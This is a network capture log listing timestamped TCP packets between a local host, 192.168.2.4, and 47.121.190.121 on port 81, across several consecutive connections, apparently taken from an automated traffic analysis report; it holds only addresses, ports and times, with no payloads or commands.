Jan 9, 2025 23:07:01.121201038 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121222019 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121232986 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121268034 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121273041 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121304989 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121313095 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121344090 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121352911 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121385098 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121397972 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121417999 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121423960 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121449947 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121460915 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121481895 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121489048 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121514082 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121525049 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121546984 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121553898 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121582031 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121588945 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121625900 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.121776104 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121824980 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121856928 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121905088 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121953011 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.121984959 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122018099 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122065067 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122097015 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122127056 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122134924 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122157097 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122159004 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122175932 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122190952 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122191906 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122225046 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122236013 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122256994 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122267962 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122293949 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122301102 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122325897 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122337103 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122359991 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122370958 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122402906 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122665882 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122699022 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122711897 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122745037 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122749090 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122781992 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122793913 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122805119 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122823954 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122829914 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122837067 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122844934 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122859001 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122868061 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122873068 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122884035 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122886896 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122895002 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122901917 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122910976 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122916937 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122925997 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122931957 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122944117 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122946978 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.122972965 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.122972965 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.123248100 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126511097 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126530886 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126540899 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126550913 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126559973 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126569986 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126571894 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126571894 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126579046 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126595020 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126605034 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126629114 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126766920 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126782894 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126799107 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126805067 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126807928 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126815081 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126816988 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126827002 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126837015 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126837969 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126847029 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126857042 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.126858950 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126871109 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.126895905 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.127155066 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.127177000 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.127187014 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.127196074 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.127197981 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.127219915 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.127234936 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.206788063 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206801891 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206819057 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206830025 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206839085 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206847906 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206856966 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206872940 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206881046 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206892014 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206897974 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.206919909 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206954002 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.206957102 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.206980944 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.206984997 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.207010031 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.207026005 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.207035065 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.207060099 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.207062006 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.207098961 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366213083 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366236925 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366255999 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366269112 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366267920 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366281033 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366290092 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366291046 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366302967 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366313934 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366316080 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366323948 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366341114 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366353035 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366364002 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366373062 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366384983 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366394997 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366394997 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366408110 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366416931 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366416931 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366431952 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366452932 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366478920 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366482019 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366524935 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366548061 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366559982 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366575003 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366583109 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366586924 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366597891 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366607904 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366609097 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366643906 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366653919 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366655111 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366666079 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366686106 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366697073 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366708040 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366715908 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366736889 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366746902 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366748095 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366777897 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366807938 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366894007 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366905928 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366924047 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366935968 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366945028 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.366956949 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366975069 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366986036 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.366986990 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.367000103 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.367002964 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.367011070 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.367022038 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.367026091 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.367055893 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:01.453310966 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:01.453396082 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:02.702352047 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:02.702403069 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:02.702569008 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:02.948610067 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:02.948654890 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:02.948690891 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:02.948718071 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:02.948725939 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:02.948748112 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:02.948748112 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:02.948774099 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.194684982 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.194737911 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.194757938 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.194772959 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.194781065 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.194807053 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.194813013 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.194844007 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.194845915 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.194883108 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441319942 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441375017 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441390038 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441426992 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441428900 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441458941 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441462994 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441493034 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441493034 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441524029 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441533089 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441556931 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441559076 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441589117 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441591978 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441622019 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441623926 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441657066 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.441657066 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.441693068 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.689642906 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689764977 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689799070 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689804077 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.689831018 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689840078 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.689840078 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.689867020 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689886093 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.689898968 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689910889 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.689932108 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689934015 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.689964056 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689966917 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.689996004 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.689997911 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.690026045 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.690028906 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.690058947 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.690063000 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.690089941 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.690093994 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.690123081 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.690126896 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.690165997 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.691008091 CET	49730	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.699599981 CET	81	49730	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.699609041 CET	49731	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.704554081 CET	81	49731	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:03.704684973 CET	49731	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.704940081 CET	49731	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:03.709831953 CET	81	49731	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:04.635081053 CET	81	49731	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:04.635143042 CET	81	49731	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:04.635222912 CET	49731	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:04.635278940 CET	49731	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:04.635400057 CET	49731	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:04.640348911 CET	81	49731	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:04.750552893 CET	49732	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:04.755584002 CET	81	49732	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:04.755731106 CET	49732	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:04.755903959 CET	49732	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:04.760690928 CET	81	49732	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:05.715003967 CET	81	49732	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:05.715029955 CET	81	49732	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:05.715363979 CET	49732	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:05.741991997 CET	49732	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:05.746925116 CET	81	49732	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:06.021043062 CET	49733	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:06.026031971 CET	81	49733	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:06.026118994 CET	49733	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:06.026402950 CET	49733	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:06.031178951 CET	81	49733	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:06.961216927 CET	81	49733	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:06.961348057 CET	49733	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:06.961404085 CET	81	49733	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:06.961442947 CET	49733	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:06.962815046 CET	49733	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:06.967633009 CET	81	49733	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:07.077533007 CET	49734	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:07.082585096 CET	81	49734	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:07.082696915 CET	49734	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:07.082813025 CET	49734	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:07.087630033 CET	81	49734	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:08.025019884 CET	81	49734	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:08.025038004 CET	81	49734	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:08.025242090 CET	49734	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:08.025340080 CET	49734	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:08.030602932 CET	81	49734	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:08.155775070 CET	49735	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:08.160793066 CET	81	49735	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:08.160882950 CET	49735	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:08.161093950 CET	49735	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:08.165991068 CET	81	49735	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:09.111773014 CET	81	49735	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:09.111797094 CET	81	49735	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:09.112046957 CET	49735	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:09.112127066 CET	49735	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:09.116897106 CET	81	49735	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:09.218313932 CET	49736	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:09.223278999 CET	81	49736	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:09.223407984 CET	49736	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:09.223571062 CET	49736	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:09.228394985 CET	81	49736	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:10.187959909 CET	81	49736	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:10.187998056 CET	81	49736	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:10.188069105 CET	49736	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:10.188112974 CET	49736	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:10.188319921 CET	49736	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:10.193079948 CET	81	49736	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:10.296351910 CET	49737	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:10.302670956 CET	81	49737	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:10.302759886 CET	49737	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:10.302876949 CET	49737	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:10.309016943 CET	81	49737	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:11.235402107 CET	81	49737	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:11.235435963 CET	81	49737	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:11.235516071 CET	49737	81	192.168.2.4	47.121.190.121
